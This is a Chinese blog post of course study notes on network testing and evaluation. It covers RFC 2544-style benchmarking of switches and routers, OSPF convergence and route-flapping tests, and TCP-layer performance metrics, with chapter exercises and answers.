<!DOCTYPE html>


<html lang="cn">
  

    <head>
      <meta charset="utf-8" />
       
      <meta name="keywords" content="Elimos" />
       
      <meta name="description" content="嗷嗷这里是Elimos的小站" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>网络测试与评价 |  Elimos&#39;Home</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-网络测试与评价"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  网络测试与评价
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2022/07/02/%E7%BD%91%E7%BB%9C%E6%B5%8B%E8%AF%95%E4%B8%8E%E8%AF%84%E4%BB%B7/" class="article-date">
  <time datetime="2022-07-02T08:28:13.000Z" itemprop="datePublished">2022-07-02</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/NetWork/">NetWork</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">8.6k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">30 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="第一章-概述"><a href="#第一章-概述" class="headerlink" title="第一章 概述"></a>第一章 概述</h1><aside>
⏰ **BMWG**(基准方法学工作组 Benchmarking Methodology Working Group)

</aside>

<h2 id="网络测试的基本概念"><a href="#网络测试的基本概念" class="headerlink" title="网络测试的基本概念"></a>网络测试的基本概念</h2><pre><code>   网络测试是指以科学的方法，通过测量手段/工具，取得网络产品或正在运行网络的性能参数和服务质量参数，这些参数包括可用性、差错率、吞吐量、时延、丢包率、连接建立时间、故障检测和改正时间等。
</code></pre>
<span id="more"></span>
<h2 id="典型的网络测试方法"><a href="#典型的网络测试方法" class="headerlink" title="典型的网络测试方法"></a>典型的网络测试方法</h2><ol>
<li>使用测试设备单独对网络设备进行测试 即单品测试，这种测试多用于再网络设备的研发阶段对设备的质量进行保障</li>
<li>将网络设备放在具体网络环境中进行测试，以评估该设备的互通性及互操作性，这种在真实环境下的测试常见于运营商、企业网中</li>
</ol>
<h2 id="网络测试的时间"><a href="#网络测试的时间" class="headerlink" title="网络测试的时间"></a>网络测试的时间</h2><aside>
⏰ 网络测试贯穿网络产品生命周期与网络建设生命周期

</aside>

<ul>
<li>网络产品的生命周期通常包括产品立项，硬件开发，协议栈开发，系统联调，互通性验证，性能评估，入网测试，产品售后维护等阶段</li>
<li>网络建设生命周期一般要经历规划、设计、部署、运行和升级5阶段。</li>
</ul>
<h3 id="RFC文档参考"><a href="#RFC文档参考" class="headerlink" title="RFC文档参考"></a>RFC文档参考</h3><p><a target="_blank" rel="noopener" href="https://www.notion.so/RFC_PAGE-5a8aa5687fa74fd3b83413a0fd8e282a">RFC_PAGE</a> </p>
<table>
<thead>
<tr>
<th>应用层</th>
<th>RFC 3511</th>
<th>RFC 2544</th>
</tr>
</thead>
<tbody><tr>
<td>表示层</td>
<td>RFC 3511</td>
<td>RFC 2544</td>
</tr>
<tr>
<td>会话层</td>
<td>RFC 3511</td>
<td>RFC 2544</td>
</tr>
<tr>
<td>传输层</td>
<td>RFC 3511</td>
<td>RFC 2544</td>
</tr>
<tr>
<td>网络层</td>
<td>RFC 3222</td>
<td>RFC 2544</td>
</tr>
<tr>
<td>数据链路层</td>
<td>RFC 2889</td>
<td>RFC 2544</td>
</tr>
<tr>
<td>物理层</td>
<td>NULL</td>
<td>NULL</td>
</tr>
</tbody></table>
<h2 id="网络测试分类📖"><a href="#网络测试分类📖" class="headerlink" title="网络测试分类📖"></a>网络测试分类📖</h2><p>一致性测试</p>
<p>测试设备相关协议的实现是否遵循协议规范</p>
<p>功能测试</p>
<p>验证产品标称支持的功能是否能正常实现</p>
<p>性能测试</p>
<p>通常被看成是一种“压力测试”，目的是观察设备在业务压力下的表现</p>
<ul>
<li>性能测验测试</li>
<li>负载测试</li>
<li>压力测试</li>
</ul>
<p>被动测试</p>
<p>在真实的运行状态下观察协议运行的过程，一般在两种状态下观察</p>
<ol>
<li>在无外界干扰的情况下按照协议的正常流程去观察</li>
<li>人为制造一些如错误的路由协议报文，关闭了路由协议的端口等异常事件并观察协议运行的状态</li>
</ol>
<h2 id="性能测试一般规则🤨"><a href="#性能测试一般规则🤨" class="headerlink" title="性能测试一般规则🤨"></a>性能测试一般规则🤨</h2><ul>
<li>一般需要具体分析<ol>
<li>为什么要对它进行测试，明确测试目的</li>
<li>明确测试对象</li>
<li>由谁来执行测试，测试执行者应具备怎样的技术条件</li>
<li>完成测试任务大约需要时间</li>
<li>达到测试目的所付出的成本是多少，软硬件如何配置</li>
<li>如何制定详细的测试方法，是否有成文的测试方法学作为参考</li>
</ol>
</li>
<li>制定测试方法前需要具备的前提条件<ol>
<li>理解技术 : 如何运作 | 相关参数 | 正常情况</li>
<li>理解被测试的设备或系统 : 支持协议 | 特点 | 运行期望</li>
<li>理解测试设备 : 配置方法 | 如何正确测试</li>
</ol>
</li>
</ul>
<h2 id="测试方法"><a href="#测试方法" class="headerlink" title="测试方法"></a>测试方法</h2><p>需要经过测试床搭建、测试环境配置、执行测试、测试结果记录及分析等阶段</p>
<ol>
<li> 配置DUT/SUT/NUT设备</li>
<li>连接测试仪表</li>
<li>运行控制软件并使之能控制仪表</li>
<li>配置相应端口的基本参数</li>
<li>使用软件模拟网络并进行相应配置</li>
<li>配置常规的测试参数，在软件界面配置相关参数，比如流的设置、包的大小</li>
<li>运行测试</li>
<li>保存测试结果</li>
</ol>
<h2 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h2><ul>
<li>测试帧长中 ：最小帧长为64 最大帧长为1518</li>
<li>每个实验测试持续时间最少达到60秒</li>
</ul>
<h1 id="第一章-习题"><a href="#第一章-习题" class="headerlink" title="第一章 习题"></a>第一章 习题</h1><ul>
<li>选择题<ul>
<li>路由器OSPF Hello报文相关字段验证不属于性能测试</li>
<li>BMWG进行网络测试方法学方面的研究</li>
<li>在网络产品的生命周期中，应该按照一致性测试，功能测试，性能测试的顺序执行测试</li>
<li>对以太网Pause帧格式进行验证属于以太网一致性测试</li>
<li>RFC3511适用于防火墙的测试</li>
<li>RFC2544<strong>不</strong>只适用于网络二三层设备的测试</li>
</ul>
</li>
</ul>
<ol>
<li>对一台具有三层功能的防火墙进行测试，可以参考RFC 3222 与 RFC 2544</li>
<li>RFC2511 中的测试项目<ul>
<li>吞吐量测试</li>
<li>等待时间测试</li>
<li>帧损失率测试</li>
<li>背靠背帧测试</li>
<li>系统恢复测试</li>
<li>重置测试</li>
</ul>
</li>
<li>对一台2E+2POS口的路由器进行性能测试：</li>
</ol>
<p>根据RFC2544标准对吞吐量进行测试</p>
<p>目的: 测试出目标路由器的吞吐量参数</p>
<p>步骤: </p>
<ol>
<li> 配置路由器与测试器</li>
<li>连接测试器</li>
<li>运行控制软件并使之能控制路由器</li>
<li>配置相应端口的基本参数</li>
<li>使用软件模拟网络并进行吞吐量测试设置</li>
<li>运行测试</li>
<li>保存测试结果</li>
</ol>
<h1 id="第二章-第二层以太网测试"><a href="#第二章-第二层以太网测试" class="headerlink" title="第二章 第二层以太网测试"></a>第二章 第二层以太网测试</h1><h3 id="交换机体系结构"><a href="#交换机体系结构" class="headerlink" title="交换机体系结构"></a>交换机体系结构</h3><ul>
<li>共享总线型</li>
<li>共享存储器</li>
<li>纵横式矩阵交换结构</li>
</ul>
<h2 id="性能测试"><a href="#性能测试" class="headerlink" title="性能测试"></a>性能测试</h2><p>性能试验测试通常可以被看成是一种“压力测试”，目的是观察设备在业务压力下的表现。</p>
<p>没有负载或低负载、基本功能(比如验证网络设备的基本转发及可用性测试等)的验证。</p>
<h2 id="负载测试"><a href="#负载测试" class="headerlink" title="负载测试"></a>负载测试</h2><p>确定在各种工作负载下系统的性能，目标是测试当负载逐渐增加时，系统各项性能指标的变化情况。</p>
<h2 id="压力测试"><a href="#压力测试" class="headerlink" title="压力测试"></a>压力测试</h2><p>是通过确定一个系统的瓶颈或者不能接收的性能点，来获得系统能提供的最大服务级别的测试。</p>
<h2 id="数据传输层相关指标"><a href="#数据传输层相关指标" class="headerlink" title="数据传输层相关指标"></a>数据传输层相关指标</h2><aside>
🎁 决定交换性能

</aside>

<ul>
<li>负载</li>
</ul>
<p>信道或设备在单位时间内所承受的通信流量称为负载(Load)。</p>
<ul>
<li>转发速率</li>
</ul>
<p>转发速率(Forwarding Rate)是用于描述交换设备帧转发能力的指标</p>
<ul>
<li>丢帧率</li>
</ul>
<p>传输过程中丢失的数据帧占应转发帧的比例称为丢帧率(Frame Loss Ratio)</p>
<ul>
<li>吞吐量</li>
</ul>
<p>在没有出现丢帧的条件下，能够传输给交换机让其转发到指定输出端口的每秒最大帧数</p>
<ul>
<li>突发</li>
</ul>
<p>一组以合法最小帧间隔传输的以太网帧称为突发(Burst)，在网络中，突发通常由节点的突发数据流量引发。一次突发传输中所包含的帧数被称为突发量(Burst Size)</p>
<h2 id="传输控制层面相关指标"><a href="#传输控制层面相关指标" class="headerlink" title="传输控制层面相关指标"></a>传输控制层面相关指标</h2><aside>
🎁 决定以太网数据传输性能

</aside>

<ul>
<li>拥塞控制</li>
</ul>
<p>也称为流量控制，指在以太网上控制源端发送数据的数量及速度使其不超过接收端所能承受的能力，以避免产生帧的丢失。</p>
<ul>
<li>地址处理</li>
</ul>
<p>交换机基于第二次MAC地址完成帧的过滤和转发</p>
<ul>
<li>地址缓存容量</li>
</ul>
<p>设备或端口模块所能拥有的最大MAC数，也就是地址交换表的最大容量</p>
<ul>
<li>地址学习速率</li>
</ul>
<p>在没有广播和丢帧的情况下，交换机学习新地址的最大速度</p>
<ul>
<li>错误帧过滤</li>
</ul>
<p>错误帧(Error Frame)：指所有过长(&gt;1518B)，过短(&lt;64B)，错位或含有错误校验序列的帧</p>
<ul>
<li>广播</li>
</ul>
<p>当交换机的输入端口收到一个帧，并且在地址表中找不到与帧的目的的MAC地址所对应的目的端口时，就会采用向所有端口泛洪广播的方法来转发该帧。</p>
<ul>
<li>广播速率：一台交换设备在某个指定的广播负载下，1秒内向它所在的广播域的所有端口发送的广播帧的数量</li>
<li>广播延迟：交换机将广播帧转发到位于同一个广播域中的每一个端口所需的时间</li>
<li>流量隔离  用于衡量交换机VLAN流量隔离功能的指标</li>
</ul>
<h2 id="产生拥塞控制的主要原因"><a href="#产生拥塞控制的主要原因" class="headerlink" title="产生拥塞控制的主要原因"></a>产生拥塞控制的主要原因</h2><ul>
<li>过载</li>
<li>线端堵塞</li>
</ul>
<h2 id="背压-Backpressure"><a href="#背压-Backpressure" class="headerlink" title="背压(Backpressure )"></a>背压(Backpressure )</h2><p>当外出或输出端口出现拥塞现象时，被交换机用来通知发送端降低帧发送速度，以阻止外部数据源继续向拥塞端口传输帧的那些方法。</p>
<h2 id="前压-Forward-pressure"><a href="#前压-Forward-pressure" class="headerlink" title="前压(Forward pressure )"></a>前压(Forward pressure )</h2><p>当上游设备以小于最小帧间隙的间隔或以超过线速的速率向下游交换机发送流量时，往往会导致下游交换机出现接收缓冲(buffer)溢出甚至阻塞。某些交换机可通过减缓输出队伍的饱和程度、禁止上游设备发送帧等强制性机制来消除或减少上述丢帧现象。具有上述功能的交换机被认为具有前压机制。</p>
<h2 id="网状流量"><a href="#网状流量" class="headerlink" title="网状流量"></a>网状流量</h2><h3 id="非网状流量"><a href="#非网状流量" class="headerlink" title="非网状流量"></a>非网状流量</h3><p>一对一关系</p>
<h3 id="部分网状流量"><a href="#部分网状流量" class="headerlink" title="部分网状流量"></a>部分网状流量</h3><p>一对多，多对一或多对多</p>
<h3 id="全网状流量"><a href="#全网状流量" class="headerlink" title="全网状流量"></a>全网状流量</h3><p>完全多对多，对于一个有n个被测端口的交互机而言，在单向流量时，将会形成$n(n-1)/2$的端口对，而在双向流量时，相当于有$n(n-1)$个端口对</p>
<h2 id="测试设置中的二层地址学习"><a href="#测试设置中的二层地址学习" class="headerlink" title="测试设置中的二层地址学习"></a>测试设置中的二层地址学习</h2><h3 id="目的"><a href="#目的" class="headerlink" title="目的"></a>目的</h3><p>在测试开始之前让被测试交换机学习测试中将要用到的MAC地址。</p>
<h3 id="要求"><a href="#要求" class="headerlink" title="要求"></a>要求</h3><p>先学习、再验证、后测试</p>
<h3 id="注意-1"><a href="#注意-1" class="headerlink" title="注意"></a>注意</h3><ol>
<li>发送地址学习帧的速率不可太大(建议：&lt;=50帧每秒)，以免因DUT地址学习速率上的限制而导致地址学习失败。</li>
<li>调整被测试交换机的地址老化时间，使得其足够长( 建议：大于测试学习时间、测试持续时间、配置测试设备时间的和) ，确保在测试结束前所学到的地址都不被老化。</li>
</ol>
<h2 id="注意-2"><a href="#注意-2" class="headerlink" title="注意"></a>注意</h2><ul>
<li>规定最小帧长是为了避免冲突</li>
<li>时延测试必须在吞吐之后</li>
</ul>
<h1 id="第二章-习题"><a href="#第二章-习题" class="headerlink" title="第二章 习题"></a>第二章 习题</h1><ul>
<li>选择题<ul>
<li>规定最小帧长<del>是为了让各节点公平访问共享介质</del>  是为了避免产生冲突,防止线路上的信号碰撞</li>
<li>确定一个设备的MAC地址学习速率和地址表容量属于以太网性能测试</li>
<li>检查一个设备是否遵循以太网的有关协议标准属于一致性测试<br>确定一个设备是否支持IEEE802.3x流量控制属于功能测试</li>
<li>当要对两个设备之间的上行链路进行测试时，应该选用非网状测试拓扑</li>
<li>在设备MAC地址处理能力测试中，需要在DUT上检查所能够配置的静态地址表项</li>
<li>根据RFC2544，在以太网测试种，对于每种测试条件，必须在至少5种不同的帧长下进行</li>
<li>对第二层设备进行性能测试时，可查RFC1252，RFC2544，RFC2285，RFC2889</li>
<li>任何情况下都可能出现提交负载与期望负载不相同</li>
</ul>
</li>
</ul>
<p>1.关于吞吐量与帧长的关系曲线图说明了：帧长到一定程度后，帧越长，同一段时间内帧数量就越少，设备吞吐量就越大</p>
<p>2.如图 循环轮转发送数据帧，尽可能使每个接口都受到测试，使测试结果可靠</p>
<table>
<thead>
<tr>
<th>端口#1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>2…</th>
</tr>
</thead>
<tbody><tr>
<td>端口#2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>1</td>
<td>3…</td>
</tr>
<tr>
<td>端口#3</td>
<td>4</td>
<td>5</td>
<td>6</td>
<td>1</td>
<td>2</td>
<td>4…</td>
</tr>
<tr>
<td>端口#4</td>
<td>5</td>
<td>6</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>5…</td>
</tr>
<tr>
<td>端口#5</td>
<td>6</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>6…</td>
</tr>
<tr>
<td>端口#6</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>4</td>
<td>5</td>
<td>1…</td>
</tr>
</tbody></table>
<p>3.给出了2个端口组成的测试拓扑，能否有效实现？至少四个，2个端口不足以测试出拥塞控制</p>
<p>4.给出了8个由端口组成的测试块，是否必须？4个测试源端口，4个测试目的端口，是必须的</p>
<p>5.有人设计了一种时间触发器方法，分析可行性：端口UE多，需要复制转发的帧就越多，可能会导致延迟加长，导致测试不准</p>
<p>6.设计可用于VLAN隔离功能测试的拓扑，思路：4个端口，俩端口在同一VLAN 俩不在同一个VLAN 控制变量测试功能</p>
<h1 id="第三章-第三层网络测试"><a href="#第三章-第三层网络测试" class="headerlink" title="第三章 第三层网络测试"></a>第三章 第三层网络测试</h1><h2 id="路由器组成"><a href="#路由器组成" class="headerlink" title="路由器组成"></a>路由器组成</h2><h3 id="路由选择部分"><a href="#路由选择部分" class="headerlink" title="路由选择部分"></a>路由选择部分</h3><p>主要作用是通过路由协议交换网络拓扑结构信息，依照拓扑结构动态更新和维护路由表，其核心构件是路由选择处理机，运行的路由协议可以有不同的类型</p>
<h3 id="分组转发部分"><a href="#分组转发部分" class="headerlink" title="分组转发部分"></a>分组转发部分</h3><p>根据控制层面生成的转发表FIB转发IP分组，由交换结构，输入端口和输出端口构成</p>
<p><strong>交换结构</strong></p>
<p>根据FIB对来自某个输入端口的分组进行处理，并使其从一个合适的输出端口转发，完成输入输出端口间的互连功能</p>
<p><strong>输入端口</strong>🍉</p>
<p>输入端口是物理链路的连接点，也是分组(数据包)的接收点。端口通常由线卡提供，一块线卡一般支持4、8或16个端口，每个输入端口有3个模块，分别对应物理层，数据链路层和网络层。</p>
<p>如果接受的分组是路由器之间的路由交换信息，则将这种分组送交路由器的路由选择处理机。</p>
<p>当一个分组正在查找转发表时，后面又紧跟着从这个输入端口收到的另一个数据包，则后到的分组旧必须在输入队列中排队等待</p>
<p><strong>输出端口</strong></p>
<p>队列和缓冲管理</p>
<h2 id="路由器的体系结构⛷️"><a href="#路由器的体系结构⛷️" class="headerlink" title="路由器的体系结构⛷️"></a>路由器的体系结构⛷️</h2><p><strong>路由器的传输控制层面</strong></p>
<p>运行在通用CPU系统中，多年来一直没有多少变化。在高可用性路由器设计中，大多采用双主控进行主从式备份，以保证传输控制平面的可靠性</p>
<p><strong>路由器的数据转发层面</strong></p>
<p>为适应不同的线路速度和不同的系统容量，采用了不同的实现技术</p>
<h2 id="路由器工作原理"><a href="#路由器工作原理" class="headerlink" title="路由器工作原理"></a>路由器工作原理</h2><h3 id="基本功能"><a href="#基本功能" class="headerlink" title="基本功能"></a>基本功能</h3><p>路由处理和分组转发处理</p>
<h3 id="路由处理"><a href="#路由处理" class="headerlink" title="路由处理"></a>路由处理</h3><p>通过路由协议收集网络拓扑信息并动态形成路由表RIB</p>
<h3 id="路由表"><a href="#路由表" class="headerlink" title="路由表"></a>路由表</h3><p>存放到特定网络的所有路由信息</p>
<h3 id="数据转发"><a href="#数据转发" class="headerlink" title="数据转发"></a>数据转发</h3><p>根据转发表FIB转发IP分组，FIB是根据RIB生成的，其表项和RIB项间又直接的对应关系，但FIB和RIB的内容并不一定匹配，格式也不相同，FIB在发送分组时可供路由协议使用，FIB更适合实现快速查找</p>
<h3 id="转发流程"><a href="#转发流程" class="headerlink" title="转发流程"></a>转发流程</h3><p>线路输入→分组头部分析→数据存储→分组头部修改和线路输出</p>
<h2 id="路由器类型"><a href="#路由器类型" class="headerlink" title="路由器类型"></a>路由器类型</h2><h3 id="性能划分"><a href="#性能划分" class="headerlink" title="性能划分"></a>性能划分</h3><p>高中低档路由器</p>
<blockquote>
<p>背板转发大于40Gbps  在25~40Gbps 之间 小于24Gbps的路由器</p>
</blockquote>
<p>线速|非线速路由器</p>
<blockquote>
<p>线速： 完全可以按照传输介质贷款进行分组转发，传输过程基本上没有间断和延时</p>
</blockquote>
<h3 id="结构划分"><a href="#结构划分" class="headerlink" title="结构划分"></a>结构划分</h3><ul>
<li>模块化路由</li>
<li>非模块化路由</li>
</ul>
<h3 id="所处位置划分"><a href="#所处位置划分" class="headerlink" title="所处位置划分"></a>所处位置划分</h3><ul>
<li>边界路由器</li>
<li>中间节点路由器</li>
</ul>
<h3 id="应用划分"><a href="#应用划分" class="headerlink" title="应用划分"></a>应用划分</h3><ul>
<li>通用路由器</li>
<li>专用路由器</li>
</ul>
<h2 id="数据转发层面相关指标"><a href="#数据转发层面相关指标" class="headerlink" title="数据转发层面相关指标"></a>数据转发层面相关指标</h2><p>主要考察包的转发是否准确，有无丢包，转发延迟多大等</p>
<ul>
<li>吞吐量</li>
</ul>
<aside>
📎 又分整机吞吐量和端口吞吐量

</aside>

<p>在没有丢包的情况下，路由设备能够转发的最大速率</p>
<ol>
<li>保证待转发的每个包都能从输入端口准确转发到适当的输出端口</li>
<li>DUT在不丢包的前提下，单位时间内能够转发的最大包数量</li>
</ol>
<ul>
<li>延迟</li>
</ul>
<p>包的第一个比特进入路由器到最后一个比特离开路由器的时间间隔，又叫时延</p>
<ul>
<li>丢包率</li>
</ul>
<p>路由器在稳定负载情况下，由于缺乏资源而不能被网络设备转发的包所占所有应被转发的包的百分比</p>
<ul>
<li>背对背</li>
</ul>
<p>指的是在一段较短的时间内，以合法的最小帧间隙在传输媒介上连续发送固定长度的包不引起丢包时的包数量。</p>
<ul>
<li>时延抖动</li>
</ul>
<p>时延的变化</p>
<ul>
<li>背板能力</li>
</ul>
<p>背板指路由设备输入和输出间的物理通路，无法直接测试，但是可以体现在吞吐量上，通常大于依赖吞吐量和测试包长所计算的值</p>
<ul>
<li>系统恢复</li>
</ul>
<p>路由设备从超载情况下恢复到正常转发状态的行为特征，主要表现为系统恢复速度的快慢</p>
<ul>
<li>系统重启</li>
</ul>
<p>系统重启时，不能正常工作，这段不可用时间的长短对评估性能优劣相当重要</p>
<h2 id="数据控制层面相关的指标"><a href="#数据控制层面相关的指标" class="headerlink" title="数据控制层面相关的指标"></a>数据控制层面相关的指标</h2><ul>
<li>路由振荡</li>
<li>路由表容量</li>
<li>路由收敛时间</li>
</ul>
<h2 id="帧长度与最大理论速率"><a href="#帧长度与最大理论速率" class="headerlink" title="帧长度与最大理论速率"></a>帧长度与最大理论速率</h2><table>
<thead>
<tr>
<th>帧长度/B</th>
<th>以太网/fps</th>
<th>16Mbps令牌环/fps</th>
<th>FDDI/fps</th>
</tr>
</thead>
<tbody><tr>
<td>64</td>
<td>14880</td>
<td>24691</td>
<td>152439</td>
</tr>
</tbody></table>
<h1 id="第三章-习题"><a href="#第三章-习题" class="headerlink" title="第三章 习题"></a>第三章 习题</h1><ul>
<li>选择题<ul>
<li>延迟测试应该在吞吐量测试之后进行</li>
<li>RFC2544中没有涉及地址学习速率</li>
<li>RFC1242中没有描述集线器</li>
<li>进行第三层设备性能测试时可以参考RFC1242，RFC2544，RFC3222 （以上全部）</li>
<li><del>在每一种测试条件下必须至少采用5种测试帧长</del></li>
</ul>
</li>
</ul>
<ol>
<li>IP包头最大长度60字节，根据RFC791标准 ，最低20字节，最大长度60字节</li>
<li>数据传输层面衡量路由器性能的主要技术指标：吞吐量，延迟，丢包率，背对背，时延抖动，背板能力，系统恢复，系统重启</li>
<li>吞吐量是在没有丢包的情况下，路由设备能够转发的最大速率。<br>在每一轮吞吐量测试中，以某个特定的速度发送测试帧，并对DUT转发的帧数进行统计。如果接收到的帧数比发送的帧数少，则下一轮测试的帧速率应降低，否则应提高。最常用的吞吐量搜索算法是二分搜索法，只需要设置初始帧速率(或负荷百分比)、最小速率和最大速率即可。若丢帧，下一轮测试速率为当前速率与最小速率的中值，否则则为当前速率与最大速率的中值。当前测试与前一次测试的帧速率之间小与或等于设置的精度时，测试结束。<br>吞吐量测试应该每次持续60s以上</li>
<li>延迟指第一个Byte进入DUT到最后一个Byte离开DUT的时间间隔<br>如果超过吞吐量就会产生丢包，失去测试意义</li>
<li>丢包率测试目的，与吞吐量的关系：<br>反应网络超负荷运作下的性能<blockquote>
<p>丢包率主要反映网络设备在超负荷运转的情况下的处理策略，设备应该采用合适的丢弃策略，尽量确保关键帧和重要帧的顺利传输</p>
</blockquote>
 帧<strong>分类：</strong>数据帧，学习帧，路由更新帧，管理帧等 可能导致大量数据帧无法交换而引起更大的丢包率的某个关键的路由信息帧和那些具有QoS保证的应用数据帧都不能被丢弃，需要及时转发</li>
<li>背对背：指的是在一段较短的时间内，以合法的最小帧间隙在传输媒介上连续发送固定长度的包不引起丢包时的包数量。需要确定DUT在不丢包的情况下能够处理的最大包数目，以考察路由器接口对于突发数据的缓存能力。</li>
</ol>
<h1 id="第四章-IP路由测试"><a href="#第四章-IP路由测试" class="headerlink" title="第四章 IP路由测试"></a>第四章 IP路由测试</h1><aside>
📎 路由器最基本的功能是路由与交换

</aside>

<aside>
🚧 路由器采用何种方法获得路由信息会直接影响路由性能

</aside>

<h2 id="路由表的生成和维护"><a href="#路由表的生成和维护" class="headerlink" title="路由表的生成和维护"></a>路由表的生成和维护</h2><h3 id="静态路由"><a href="#静态路由" class="headerlink" title="静态路由"></a>静态路由</h3><p>适用于拓扑结构比较简单的环境</p>
<p>默认路由可以减少路由表规模并且降低路由表的维护开销</p>
<h3 id="动态路由"><a href="#动态路由" class="headerlink" title="动态路由"></a>动态路由</h3><ul>
<li>RIP(距离矢量路由协议)</li>
<li>OSPF(链路状态路由协议)</li>
<li>IS-IS(链路状态路由协议)</li>
<li>BGP(距离矢量路由协议)</li>
</ul>
<h2 id="OSPF"><a href="#OSPF" class="headerlink" title="OSPF"></a>OSPF</h2><p>每个OSPF路由器以自己为根，采用SPF计算得到每个目的网络的最短路径，最终得到一棵SPT，然后使用通向每个网络的最佳路径填充路由表</p>
<aside>
🥶 OSPF可借助分区域网络设计原则来提高路由的可靠性和可扩展性

</aside>

<h2 id="路由收敛-Convergence"><a href="#路由收敛-Convergence" class="headerlink" title="路由收敛(Convergence)"></a>路由收敛(Convergence)</h2><p>路由收敛是指同一个网络中所有路由器对网络拓扑的认识达到一致的过程。也被理解为路由变化通知到全网所用时间。收敛是评估路由协议的一个关键指标。路由协议的收敛速度越快，其运行性能就越好。</p>
<h2 id="路由震荡-Flapping"><a href="#路由震荡-Flapping" class="headerlink" title="路由震荡(Flapping)"></a>路由震荡(Flapping)</h2><p>又叫路由波动是指由于种种原因导致到某个目的网络的路由在短期内反复撤销和重现。路由震荡通常以每秒更新路由的数量来衡量，每秒更新路由的数量越大，说明路由震荡越严重。路由震荡是路由不稳定性的主要表现，对路由器转发能力有很大的影响</p>
<h2 id="路由震荡测试基本设计思路"><a href="#路由震荡测试基本设计思路" class="headerlink" title="路由震荡测试基本设计思路"></a>路由震荡测试基本设计思路</h2><p>使用测试仪表的一个端口向DUT下发多个特定IP网络前缀的路由。另一端口用来发送到这些特定IP网络前缀的测试流量，并且在路由震荡测试的整个过程中，流量发送端口始终保持流量的发送状态不变。当路由已稳定时，撤消下发的多个特定IP网络前缀中的部分路由。等路由再次稳定时，又重新下发刚撤消的路由。如此反复下发、撤消，人为制造出路由震荡的环境。然后在测试仪表上观测控制层面的转发，并同时观测数据转发层面测试流的转发速率，得到测试结果</p>
<h2 id="路由震荡测试方法基本原理"><a href="#路由震荡测试方法基本原理" class="headerlink" title="路由震荡测试方法基本原理"></a>路由震荡测试方法基本原理</h2><p>在网络中，某些事件可能导致全网范围内的路由重新计算，直接影响到路由的稳定性，从而影响IP报文的转发。路由震荡是网络中路由不稳定的主要表现形式。</p>
<aside>
⏰ 路由收敛和路由震荡测试互不相关

</aside>

<h1 id="第四章-习题"><a href="#第四章-习题" class="headerlink" title="第四章 习题"></a>第四章 习题</h1><ul>
<li>选择题<ul>
<li>Spirent TestCenter不支持EIBGP路由协议</li>
<li>控制台读数法，控制层面学习法，数据转发层面和控制层面结合法测出的路由器容量都是FIB表的容量</li>
<li>路由真的测试和路由收敛测试谁先测试均可以</li>
<li>进行OSPF点到点链路形成全邻接状态的实验可以参考RFC4063</li>
</ul>
</li>
</ul>
<ol>
<li>协议指标是路由指标的基础</li>
<li>为了测试传输、泛洪等不属于处理一条LSA时间的额外时间，仪表仿真的OSPF路由器需要向DUT下发一个已经存在于DUT的LSDB中的重复LSA，观察这个LSA下发与收到LSAck的时间差(处理重复LSA的时间dupLSAprocTime)，由于对重复LSA不会又对LSA的处理，因此该事件即为处理一条LSA时间无关的那些用于LSA发送和LSAck传输的额外时间</li>
<li>先测试传输，泛洪等其他额外时间，需要下发一个重复LSA，观察下发与收到LSAck的时间差，该事件为用于发送与Ack的传输等的额外时间，然后发布第二次重复LSA，获取与LSAck的时间差，此时获取到的为全部SPF时间，用该全部SPF时间减去传输额外时间即为SPF算法运行的时间</li>
</ol>
<h1 id="第五章-第4-7层网络性能测试"><a href="#第五章-第4-7层网络性能测试" class="headerlink" title="第五章 第4~7层网络性能测试"></a>第五章 第4~7层网络性能测试</h1><aside>
😶 第4~7层测试应采用3种模式：服务器系统模式、网络设备模式、网络系统模式

</aside>

<h2 id="TCP层面指标"><a href="#TCP层面指标" class="headerlink" title="TCP层面指标"></a>TCP层面指标</h2><aside>
⚠️ 决定传输质量

</aside>

<ul>
<li>最大TCP连接建立速率</li>
</ul>
<p>最大TCP连接建立速率是指被测设备或被测系统能够成功处理请求连接的前提下，在单位时间内所能承受的最大TCP连接建立数目，用connections/sec 表示，这一指标通常被称为最大TCP新建速率。它主要反映了被测设备的CPU使用情况以及对连接的处理速度。</p>
<ul>
<li>最大TCP连接拆除速率</li>
</ul>
<p>并发TCP连接容量：并发连接是指多个主机或用户同时连接到一个主机或设备进行数据传输，并发TCP连接容量是指被测设备能够同时成功处理的最大TCP连接数目，它反映出被测设备对多个连接的访问控制能力和连接状态跟踪能力。</p>
